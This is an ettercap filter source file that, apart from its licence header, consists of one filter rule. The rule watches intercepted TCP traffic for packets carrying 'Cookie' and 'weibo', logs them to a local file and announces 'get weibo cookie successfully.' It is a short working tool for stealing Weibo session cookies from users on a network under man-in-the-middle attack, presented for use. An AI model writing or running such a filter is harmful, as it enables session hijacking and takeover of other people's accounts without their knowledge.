############################################################################
#                                                                          #
#  ettercap -- etter.filter -- filter source file                          #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################


if (ip.proto == TCP && search(DATA.data, "Cookie")) {
    if (search(DATA.data, "weibo")) {
        log(DATA.data, "./logs/weibo.log");
        msg("get weibo cookie successfully.\n");
    }
}

